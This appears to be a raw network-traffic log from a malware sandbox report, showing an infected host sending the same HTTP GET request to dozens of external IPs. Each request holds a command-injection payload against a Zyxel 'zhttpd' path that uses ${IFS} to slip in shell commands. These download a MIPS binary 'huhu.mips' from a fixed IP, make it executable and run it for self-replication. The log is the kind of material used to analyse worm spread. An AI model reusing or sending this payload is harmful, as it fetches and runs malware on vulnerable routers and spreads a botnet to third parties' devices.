                                              Jan 29, 2024 07:04:00.213964939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6975192.168.2.144799495.120.106.245443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.213988066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6976192.168.2.1432772193.28.29.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.214029074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6977192.168.2.1452096138.118.152.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.214057922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6978192.168.2.1437822165.20.149.3443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.214082956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6979192.168.2.143380646.65.127.105443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.214126110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6980192.168.2.145622252.78.251.130443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.214174032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6981192.168.2.144631851.52.75.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.214201927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6982192.168.2.1453520176.119.81.167443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.214234114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6983192.168.2.146069024.153.176.55443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.214273930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6984192.168.2.1436306119.251.94.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.214289904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6985192.168.2.145517863.114.99.194443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.214323044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6986192.168.2.14439602.123.188.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.214358091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6987192.168.2.1459274206.5.146.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.214412928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6988192.168.2.145504061.238.218.191443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.214462042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6989192.168.2.1435074142.82.142.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.214512110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6990192.168.2.1436374109.197.238.247443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.214550018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6991192.168.2.1445054110.232.43.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.214577913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6992192.168.2.1440652168.126.230.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.214634895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6993192.168.2.143304682.15.193.170443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.214654922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6994192.168.2.145073478.74.252.206443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.214695930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6995192.168.2.145566061.2.43.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.214744091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6996192.168.2.146057642.142.82.105443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.214771986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6997192.168.2.1435110131.218.76.135443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.214806080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6998192.168.2.1453070179.146.198.194443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.214850903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6999192.168.2.1450750125.24.43.70443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.214874983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7000192.168.2.1459768196.248.205.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.214904070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7001192.168.2.144276494.242.193.228443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.214953899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7002192.168.2.1447764124.37.192.181443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.214999914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7003192.168.2.1441036177.202.67.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.215040922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7004192.168.2.1448410196.118.148.203443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.215068102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7005192.168.2.143680436.89.34.5443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.215109110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7006192.168.2.144544484.220.136.131443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.215132952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7007192.168.2.143763027.51.25.204443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.215169907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7008192.168.2.1434504102.176.104.47443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.215215921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7009192.168.2.1457832171.179.206.69443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.215266943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7010192.168.2.1434342222.214.101.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.215310097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7011192.168.2.143563882.167.9.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.215337038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7012192.168.2.1457544147.34.183.97443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.215394974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7013192.168.2.1453430217.124.73.30443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.215424061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7014192.168.2.1446916129.164.216.213443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.215477943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7015192.168.2.1435754200.157.185.24443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.215501070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7016192.168.2.1433204132.162.89.131443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.215529919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7017192.168.2.1453970176.229.224.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.215569973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7018192.168.2.144102452.30.201.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.215621948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7019192.168.2.145747086.45.50.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.215672970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7020192.168.2.144688288.77.37.224443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.215692043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7021192.168.2.1447698209.159.9.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.215744972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7022192.168.2.1447806125.103.161.33443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.215780973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7023192.168.2.143993299.20.223.24443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.215816975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7024192.168.2.1440054119.173.58.24443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.215878010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7025192.168.2.1441098110.2.122.79443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.215893030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7026192.168.2.145402019.146.152.222443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.215923071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7027192.168.2.143414052.8.252.243443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.215967894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7028192.168.2.1434154105.134.1.250443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.216001987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7029192.168.2.1458410164.47.78.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.216017962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7030192.168.2.1445484101.184.228.240443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.216304064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7031192.168.2.1453160101.245.58.205443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.219005108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7032192.168.2.1434170119.64.105.230443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.219667912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7033192.168.2.1433970163.55.241.88443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.219697952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7034192.168.2.1456660184.4.182.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.219782114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7035192.168.2.1439112133.153.142.191443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.219811916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7036192.168.2.144636096.252.178.223443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.219831944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7037192.168.2.1441510140.98.52.113443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.219897032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7038192.168.2.143873861.0.123.253443
                                              TimestampBytes transferredDirectionData
